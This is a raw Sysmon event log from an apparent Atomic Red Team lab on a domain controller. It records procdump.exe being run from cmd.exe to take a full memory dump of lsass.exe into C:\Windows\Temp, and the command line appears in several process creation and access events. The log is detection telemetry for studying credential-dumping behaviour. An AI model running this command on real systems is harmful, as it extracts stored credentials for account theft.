15:52:59.435{D28789B6-7CDB-5FA1-1A01-000000008801}47444092C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{D28789B6-7CDB-5FA1-1D01-000000008801}3940C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+8a5b|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7800|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 154100x80000000000000005419Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.435{D28789B6-7CDB-5FA1-1D01-000000008801}3940C:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{D28789B6-7CD8-5FA1-59E7-0A0000000000}0xae7590HighMD5=F13DAB7D9CE88DDC0C80C2B9C5F422B5,SHA256=E2A7A9A803C6A4D2D503BB78A73CD9951E901BEB5FB450A2821EAF740FC48496,IMPHASH=E6F7F291413118F49398761021BAFCF2{D28789B6-7CDB-5FA1-1A01-000000008801}4744C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp 11241100x80000000000000005418Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localEXE2020-11-03 15:52:59.419{D28789B6-7CDB-5FA1-1A01-000000008801}4744C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeC:\AtomicRedTeam\atomics\T1003.001\bin\procdump64.exe2020-11-03 15:52:59.419 10341000x80000000000000005417Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.419{D28789B6-7CDB-5FA1-1A01-000000008801}47444092C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe+7661|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 13241300x80000000000000005416Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.localAlert,Sysinternals Tool UsedSetValue2020-11-03 15:52:59.372{D28789B6-7CDB-5FA1-1A01-000000008801}4744C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exeHKU\S-1-5-21-635769498-3620204953-2298246598-500\SOFTWARE\Sysinternals\ProcDump\EulaAcceptedDWORD (0x00000001) 10341000x80000000000000005415Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7CD8-5FA1-EF00-000000008801}39643644C:\Windows\system32\conhost.exe{D28789B6-7CDB-5FA1-1A01-000000008801}4744C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005414Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CDB-5FA1-1A01-000000008801}4744C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005413Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005412Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005411Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005410Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005409Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005408Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005407Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005406Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005405Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005404Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CDB-5FA1-1C01-000000008801}1556C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005403Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005402Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005401Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005400Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005399Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005398Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005397Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005396Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005395Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CDB-5FA1-1C01-000000008801}1556C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005394Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005393Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.309{D28789B6-7CDB-5FA1-1801-000000008801}44044144C:\Windows\system32\cmd.exe{D28789B6-7CDB-5FA1-1A01-000000008801}4744C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000005392Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:59.304{D28789B6-7CDB-5FA1-1A01-000000008801}4744C:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe10.0Sysinternals process dump utilityProcDumpSysinternals - www.sysinternals.comprocdumpC:\AtomicRedTeam\atomics\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp 